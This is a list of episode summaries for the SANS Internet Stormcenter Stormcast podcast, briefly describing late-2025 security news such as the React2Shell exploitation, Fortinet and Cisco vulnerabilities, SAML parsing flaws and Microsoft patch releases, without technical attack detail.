SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)

There's a positive trend in 2025, with fewer internet-exposed industrial control systems and a significant drop in servers using outdated SSL versions. However, the decline raises questions about whether it's due to cleanup efforts or aging devices. A critical vulnerability in HPE's OneView software allows unauthenticated remote code execution, highlighting urgent patching needs. Meanwhile, TruffleHog has upped its game, now detecting and validating JWT tokens with public keys to fortify security.

Exploit trends are shifting, with attackers honing in on applications that may have been overlooked before. There's an urgent warning about Cisco's email appliances facing a known vulnerability. SonicWall is in the spotlight due to a local privilege escalation issue now being actively exploited. Google has added a new CVE for a previously mysterious vulnerability linked to WebGPU, but no patch is available yet. Best practices for securing administrative access are also discussed, underscoring the need for robust protection.

Microsoft is moving away from RC4 for Windows authentication, providing guidance for a smooth transition. FortiCloud's SSO vulnerability is being actively exploited, prompting urgent patching recommendations. Additionally, three vulnerabilities were discovered in FreePBX, including a concerning authentication bypass that could lead to remote code execution. Security measures are emphasized, especially after potential FortiGate compromises where attackers could access sensitive configurations.

Explore the surge of React2Shell exploits detected in honeypots, highlighting variances in malware delivery. Delve into the complexities of SAML authentication, where misalignments in XML parsing can lead to security vulnerabilities. Discover how attackers misuse signed SAML error messages for fraud. Lastly, uncover issues with Microsoft Message Queuing failures linked to a recent update, shedding light on the cascading effects of software patches. This discussion is packed with insights for anyone interested in cybersecurity!

Explore the intriguing world of DLL entry points, revealing how they can execute malicious code upon loading. Discover the ongoing ClickFix attacks that cleverly use the finger protocol to deliver malware. Learn about Apple's comprehensive December 2025 patches addressing critical vulnerabilities. Plus, uncover new security concerns in React Server Components, including Denial of Service and source code exposures. Stay informed on network mitigation strategies to prevent unauthorized access.

Explore the excitement of running AI Gemma 3 on modest hardware, making AI more accessible for experimentation. Delve into a mystery Google Chrome 0-Day vulnerability that poses real risks with its exploitation already underway, despite lacking a CVE. Learn about the alarming SOAPwn attack that exposes .NET applications to serious threats through HTTP client proxies. Stay informed on the implications of these findings for developers and cybersecurity enthusiasts alike!

Discover a potential new variant of an exploit targeting Kubernetes OS command injection. Dive into the React2Shell vulnerability, along with tactical advice on filtering Next.js headers. Learn about the recent Notepad++ update hijack and the importance of verifying software signatures. Uncover a new privilege escalation vulnerability in macOS that remains unpatched. Stay informed on the latest threats and protective measures in the ever-evolving landscape of cybersecurity!

This week, the discussion highlights crucial security updates from Microsoft, including 57 flaws, with some being actively exploited. Adobe addresses vulnerabilities in ColdFusion and Acrobat, raising concerns about potential exploits. Ivanti fixes a critical stored XSS issue in its Endpoint Manager, while Fortinet faces a cryptographic flaw allowing SSO bypass. Lastly, the ruby-saml library gets patched for an incomplete fix from previous vulnerabilities. Stay informed to keep your systems secure!

Discover the security concerns surrounding nanoKVM devices, including insecure firmware updates and weak password issues. Learn about the Ghostframe phishing kit, which skillfully evades detection using unique subdomains. The discussion also covers a significant update from WatchGuard, addressing multiple vulnerabilities, including a notable DoS attack risk. Tune in for insights on flaws, mitigations, and the latest in cyber threats!

Malicious scripts are using AutoIT3's FileInstall to drop shellcodes during execution, revealing new obfuscation techniques. Meanwhile, the React2Shell vulnerability is causing a frantic race to patch systems, with aggressive scanning and exploit attempts. Additionally, a recently patched XXE flaw in the Apache Tika library highlights the importance of updating software, especially for PDF parsing. This episode dives deep into these pressing cybersecurity issues.